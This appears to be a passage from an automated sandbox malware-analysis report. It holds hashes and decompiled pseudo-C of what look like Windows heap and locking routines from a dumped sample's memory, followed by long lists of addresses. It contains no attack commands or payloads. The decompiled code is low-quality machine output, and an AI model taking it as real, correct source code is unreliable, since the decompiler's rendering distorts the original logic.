                                                                                                                                                                                            • Opcode Fuzzy Hash: c344f8535f38b06cc945ff2823cad6ded8a8aa5d8b65a30fa544651490a4b5d0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 003101BB922B41CFE711BB14D884F2137F8EB41B61F064449E444DFA56DB359991CB10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 29%
                                                                                                                                                                                            			E33CE7662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E33CEB910();
					} else {
						E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E33CEB910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E33CEB910(", passed to %s", _t29);
					}
					_push("\n");
					E33CEB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x33de47a1 = 1;
						asm("int3");
						 *0x33de47a1 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                                                                                            0x33ce7667
                                                                                                                                                                                            0x33ce7669
                                                                                                                                                                                            0x33ce7672
                                                                                                                                                                                            0x33d4ad93
                                                                                                                                                                                            0x33d4adb2
                                                                                                                                                                                            0x33d4adb7
                                                                                                                                                                                            0x33d4ad95
                                                                                                                                                                                            0x33d4adaa
                                                                                                                                                                                            0x33d4adaf
                                                                                                                                                                                            0x33d4adc3
                                                                                                                                                                                            0x33d4adcc
                                                                                                                                                                                            0x33d4add4
                                                                                                                                                                                            0x33d4adda
                                                                                                                                                                                            0x33d4addb
                                                                                                                                                                                            0x33d4ade0
                                                                                                                                                                                            0x33d4adf0
                                                                                                                                                                                            0x33d4adf2
                                                                                                                                                                                            0x33d4adf9
                                                                                                                                                                                            0x33d4adfa
                                                                                                                                                                                            0x33d4adfa
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4ae01
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                            • API String ID: 0-3061284088
                                                                                                                                                                                            • Opcode ID: 99ec7767e7749972a792cb861788d29e3e408370b5a5bd9c3fa3617b2bf350ba
                                                                                                                                                                                            • Instruction ID: c05586c18b51c1cc86e598e18a9609210a64709a0e68cd6549eab73bf8ae2854
                                                                                                                                                                                            • Opcode Fuzzy Hash: 99ec7767e7749972a792cb861788d29e3e408370b5a5bd9c3fa3617b2bf350ba
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8401C03741B7C09FD304A729D409F527BF4EB41B31F1A048AF054CBD82DF94A841E650
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                            			E33CF58E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x33dcbd28);
				_push(0x33d3ad20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x33deb370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E33CF8120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E33CF80BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E33CF8009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				L33D38F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L33CF53C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E33CF6055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E33CF6074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E33CF6179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E33D2B490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E33CF63CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L33D02330(_t268, _t377 + 0x2c);
										L33DC4407(_t377);
										L33D024D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = L33CF64F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x33de6644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E33D05D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E33D346E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											L33D38F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											L33CF6D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											L33CF6D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - L33CF6E00;
											if(_t342 == L33CF6E00) {
												L33CF6E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E33CF61C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push(4);
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E33D343A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L33D02330(_t288, _t377 + 0x2c);
														L33DC4407(_t377);
														L33D024D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E33CF7290;
											if(_t342 != E33CF7290) {
												__eflags = _t342 - E33CF5570;
												if(_t342 != E33CF5570) {
													 *0x33de91e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E33CF5570( &_v216);
												goto L33;
											}
											E33CF7290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(L33CF6970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E33CEBE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(L33CF6929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != L33CF6B70) {
											__eflags = _t384 - E33CF56E0;
											if(_t384 != E33CF56E0) {
												 *0x33de91e0();
												 *_t384();
											} else {
												E33CF56E0(_t361);
											}
										} else {
											L33CF6B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E33CF7F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L33D02330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return L33D024D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					L33D38F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					L33CF4A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = L33D329A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}












































































































                                                                                                                                                                                            0x33cf58e0
                                                                                                                                                                                            0x33cf58e0
                                                                                                                                                                                            0x33cf58e0
                                                                                                                                                                                            0x33cf58e5
                                                                                                                                                                                            0x33cf58e7
                                                                                                                                                                                            0x33cf58ec
                                                                                                                                                                                            0x33cf58f7
                                                                                                                                                                                            0x33cf58f8
                                                                                                                                                                                            0x33cf58fe
                                                                                                                                                                                            0x33cf5903
                                                                                                                                                                                            0x33cf5906
                                                                                                                                                                                            0x33cf5908
                                                                                                                                                                                            0x33cf590b
                                                                                                                                                                                            0x33cf590c
                                                                                                                                                                                            0x33cf590d
                                                                                                                                                                                            0x33cf590e
                                                                                                                                                                                            0x33cf5912
                                                                                                                                                                                            0x33cf5918
                                                                                                                                                                                            0x33cf591b
                                                                                                                                                                                            0x33cf591e
                                                                                                                                                                                            0x33cf5928
                                                                                                                                                                                            0x33cf592e
                                                                                                                                                                                            0x33cf5935
                                                                                                                                                                                            0x33cf593c
                                                                                                                                                                                            0x33cf5943
                                                                                                                                                                                            0x33cf594a
                                                                                                                                                                                            0x33cf5951
                                                                                                                                                                                            0x33cf5958
                                                                                                                                                                                            0x33cf595f
                                                                                                                                                                                            0x33cf5966
                                                                                                                                                                                            0x33cf5970
                                                                                                                                                                                            0x33cf597a
                                                                                                                                                                                            0x33cf5985
                                                                                                                                                                                            0x33cf598b
                                                                                                                                                                                            0x33cf5998
                                                                                                                                                                                            0x33cf599d
                                                                                                                                                                                            0x33cf59a3
                                                                                                                                                                                            0x33cf59a8
                                                                                                                                                                                            0x33cf59b0
                                                                                                                                                                                            0x33cf59b2
                                                                                                                                                                                            0x33cf59b8
                                                                                                                                                                                            0x33cf59b8
                                                                                                                                                                                            0x33cf59c8
                                                                                                                                                                                            0x33cf59cd
                                                                                                                                                                                            0x33cf59d0
                                                                                                                                                                                            0x33cf59d7
                                                                                                                                                                                            0x33cf59e5
                                                                                                                                                                                            0x33cf59ea
                                                                                                                                                                                            0x33cf59f8
                                                                                                                                                                                            0x33d50745
                                                                                                                                                                                            0x33d5074f
                                                                                                                                                                                            0x33d5074f
                                                                                                                                                                                            0x33d50756
                                                                                                                                                                                            0x33cf5a25
                                                                                                                                                                                            0x33cf5a25
                                                                                                                                                                                            0x33cf5a2c
                                                                                                                                                                                            0x33cf5a31
                                                                                                                                                                                            0x33cf5a38
                                                                                                                                                                                            0x33cf5fef
                                                                                                                                                                                            0x33cf5fef
                                                                                                                                                                                            0x33cf5ff6
                                                                                                                                                                                            0x33cf5ffb
                                                                                                                                                                                            0x33cf6002
                                                                                                                                                                                            0x33cf6007
                                                                                                                                                                                            0x33cf6007
                                                                                                                                                                                            0x33cf6009
                                                                                                                                                                                            0x33cf600f
                                                                                                                                                                                            0x33cf6017
                                                                                                                                                                                            0x33cf601c
                                                                                                                                                                                            0x33cf601c
                                                                                                                                                                                            0x33cf5b95
                                                                                                                                                                                            0x33cf5b99
                                                                                                                                                                                            0x33cf5f2d
                                                                                                                                                                                            0x33cf5f32
                                                                                                                                                                                            0x33cf5f36
                                                                                                                                                                                            0x33cf5f36
                                                                                                                                                                                            0x33cf5ba1
                                                                                                                                                                                            0x33cf5fcf
                                                                                                                                                                                            0x33cf5fcf
                                                                                                                                                                                            0x33cf5fd4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5fd6
                                                                                                                                                                                            0x33cf5fd6
                                                                                                                                                                                            0x33cf5fd9
                                                                                                                                                                                            0x33d507dc
                                                                                                                                                                                            0x33d507e3
                                                                                                                                                                                            0x33d507e5
                                                                                                                                                                                            0x33d507ea
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d507ea
                                                                                                                                                                                            0x33cf5fdf
                                                                                                                                                                                            0x33cf5fe2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5fe8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5ba7
                                                                                                                                                                                            0x33cf5ba9
                                                                                                                                                                                            0x33cf5e71
                                                                                                                                                                                            0x33cf5e77
                                                                                                                                                                                            0x33cf5e79
                                                                                                                                                                                            0x33cf5bb4
                                                                                                                                                                                            0x33cf5bba
                                                                                                                                                                                            0x33d50836
                                                                                                                                                                                            0x33d5083a
                                                                                                                                                                                            0x33d50841
                                                                                                                                                                                            0x33d50847
                                                                                                                                                                                            0x33d50847
                                                                                                                                                                                            0x33cf5bd4
                                                                                                                                                                                            0x33cf5bda
                                                                                                                                                                                            0x33cf5be0
                                                                                                                                                                                            0x33cf5be7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5bed
                                                                                                                                                                                            0x33cf5bf3
                                                                                                                                                                                            0x33cf5ae0
                                                                                                                                                                                            0x33cf5ae0
                                                                                                                                                                                            0x33cf5aec
                                                                                                                                                                                            0x33cf5aef
                                                                                                                                                                                            0x33cf5af2
                                                                                                                                                                                            0x33cf5af5
                                                                                                                                                                                            0x33cf5af8
                                                                                                                                                                                            0x33cf5afb
                                                                                                                                                                                            0x33cf5b07
                                                                                                                                                                                            0x33cf5f69
                                                                                                                                                                                            0x33cf5f73
                                                                                                                                                                                            0x33cf5f8b
                                                                                                                                                                                            0x33cf5f90
                                                                                                                                                                                            0x33cf5f92
                                                                                                                                                                                            0x33d5077f
                                                                                                                                                                                            0x33d5077f
                                                                                                                                                                                            0x33d50789
                                                                                                                                                                                            0x33cf5b43
                                                                                                                                                                                            0x33cf5b43
                                                                                                                                                                                            0x33cf5b49
                                                                                                                                                                                            0x33cf5b53
                                                                                                                                                                                            0x33cf5b5a
                                                                                                                                                                                            0x33cf5b5d
                                                                                                                                                                                            0x33cf5b66
                                                                                                                                                                                            0x33cf5b67
                                                                                                                                                                                            0x33cf5b6d
                                                                                                                                                                                            0x33cf5b6e
                                                                                                                                                                                            0x33cf5b74
                                                                                                                                                                                            0x33cf5b7a
                                                                                                                                                                                            0x33cf5b7b
                                                                                                                                                                                            0x33cf5b80
                                                                                                                                                                                            0x33cf5b86
                                                                                                                                                                                            0x33cf5b8f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5b8f
                                                                                                                                                                                            0x33cf5f98
                                                                                                                                                                                            0x33cf5f98
                                                                                                                                                                                            0x33cf5f9e
                                                                                                                                                                                            0x33cf5fa0
                                                                                                                                                                                            0x33cf5fa7
                                                                                                                                                                                            0x33cf5fae
                                                                                                                                                                                            0x33cf5fb1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5fb1
                                                                                                                                                                                            0x33cf5b13
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5b19
                                                                                                                                                                                            0x33cf5b30
                                                                                                                                                                                            0x33cf5b35
                                                                                                                                                                                            0x33cf5b3b
                                                                                                                                                                                            0x33cf5b41
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5b41
                                                                                                                                                                                            0x33cf5bf9
                                                                                                                                                                                            0x33cf5bfe
                                                                                                                                                                                            0x33cf5e84
                                                                                                                                                                                            0x33cf5e8d
                                                                                                                                                                                            0x33cf5e93
                                                                                                                                                                                            0x33cf5ea1
                                                                                                                                                                                            0x33cf5ea9
                                                                                                                                                                                            0x33cf5eb4
                                                                                                                                                                                            0x33cf5eb9
                                                                                                                                                                                            0x33cf5ec0
                                                                                                                                                                                            0x33cf5ec6
                                                                                                                                                                                            0x33cf5ec7
                                                                                                                                                                                            0x33cf5ed0
                                                                                                                                                                                            0x33cf5ed1
                                                                                                                                                                                            0x33cf5ed2
                                                                                                                                                                                            0x33cf5ed8
                                                                                                                                                                                            0x33cf5f15
                                                                                                                                                                                            0x33cf5d52
                                                                                                                                                                                            0x33cf5d52
                                                                                                                                                                                            0x33cf5d59
                                                                                                                                                                                            0x33cf5d60
                                                                                                                                                                                            0x33d50909
                                                                                                                                                                                            0x33d50909
                                                                                                                                                                                            0x33cf5d6d
                                                                                                                                                                                            0x33cf5d74
                                                                                                                                                                                            0x33cf5d81
                                                                                                                                                                                            0x33cf5d86
                                                                                                                                                                                            0x33cf5d8d
                                                                                                                                                                                            0x33cf5d9e
                                                                                                                                                                                            0x33d50955
                                                                                                                                                                                            0x33d50958
                                                                                                                                                                                            0x33d5095e
                                                                                                                                                                                            0x33d50960
                                                                                                                                                                                            0x33d50963
                                                                                                                                                                                            0x33d50969
                                                                                                                                                                                            0x33d50969
                                                                                                                                                                                            0x33d5096f
                                                                                                                                                                                            0x33d5096f
                                                                                                                                                                                            0x33d5096f
                                                                                                                                                                                            0x33d5096f
                                                                                                                                                                                            0x33d50971
                                                                                                                                                                                            0x33d50977
                                                                                                                                                                                            0x33d50979
                                                                                                                                                                                            0x33d50989
                                                                                                                                                                                            0x33d50992
                                                                                                                                                                                            0x33d50998
                                                                                                                                                                                            0x33d5099c
                                                                                                                                                                                            0x33d5099e
                                                                                                                                                                                            0x33d509a4
                                                                                                                                                                                            0x33d509a6
                                                                                                                                                                                            0x33d509ac
                                                                                                                                                                                            0x33d509ac
                                                                                                                                                                                            0x33d509b4
                                                                                                                                                                                            0x33d509b4
                                                                                                                                                                                            0x33d509bc
                                                                                                                                                                                            0x33d509c6
                                                                                                                                                                                            0x33d509ce
                                                                                                                                                                                            0x33d509cf
                                                                                                                                                                                            0x33d509d1
                                                                                                                                                                                            0x33d509d4
                                                                                                                                                                                            0x33cf5da4
                                                                                                                                                                                            0x33cf5da4
                                                                                                                                                                                            0x33cf5dac
                                                                                                                                                                                            0x33cf5f0b
                                                                                                                                                                                            0x33cf5f0b
                                                                                                                                                                                            0x33cf5db8
                                                                                                                                                                                            0x33d509e2
                                                                                                                                                                                            0x33d509e9
                                                                                                                                                                                            0x33d509ef
                                                                                                                                                                                            0x33d509ef
                                                                                                                                                                                            0x33cf5dbe
                                                                                                                                                                                            0x33cf5dc1
                                                                                                                                                                                            0x33cf5dc7
                                                                                                                                                                                            0x33cf5dc9
                                                                                                                                                                                            0x33cf5dcc
                                                                                                                                                                                            0x33cf5dd2
                                                                                                                                                                                            0x33cf5de0
                                                                                                                                                                                            0x33cf5de0
                                                                                                                                                                                            0x33cf5de2
                                                                                                                                                                                            0x33cf5de8
                                                                                                                                                                                            0x33cf5dea
                                                                                                                                                                                            0x33cf5df0
                                                                                                                                                                                            0x33cf5df3
                                                                                                                                                                                            0x33cf5e00
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5e08
                                                                                                                                                                                            0x33cf5eec
                                                                                                                                                                                            0x33cf5eef
                                                                                                                                                                                            0x33d509f9
                                                                                                                                                                                            0x33d50a00
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d50a06
                                                                                                                                                                                            0x33cf5ef7
                                                                                                                                                                                            0x33cf5f00
                                                                                                                                                                                            0x33cf5e29
                                                                                                                                                                                            0x33cf5e29
                                                                                                                                                                                            0x33cf5e2c
                                                                                                                                                                                            0x33cf5e34
                                                                                                                                                                                            0x33cf5e38
                                                                                                                                                                                            0x33cf5e3a
                                                                                                                                                                                            0x33cf5e40
                                                                                                                                                                                            0x33cf5e42
                                                                                                                                                                                            0x33cf5e4e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5e58
                                                                                                                                                                                            0x33cf5e58
                                                                                                                                                                                            0x33cf5e5e
                                                                                                                                                                                            0x33cf5e66
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5e6c
                                                                                                                                                                                            0x33cf5e4e
                                                                                                                                                                                            0x33cf5e0e
                                                                                                                                                                                            0x33cf5e0e
                                                                                                                                                                                            0x33cf5e21
                                                                                                                                                                                            0x33cf5e23
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5e23
                                                                                                                                                                                            0x33cf5de0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf5d9e
                                                                                                                                                                                            0x33cf5eda
                                                                                                                                                                                            0x33cf5ee0
                                                                                                                                                                                            0x33cf5f53
                                                                                                                                                                                            0x33cf5f59
                                                                                                                                                                                            0x33cf602d
                                                                                                                                                                                            0x33cf6033
                                                                                                                                                                                            0x33cf6035
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf6035
                                                                                                                                                                                            0x33cf5f5f
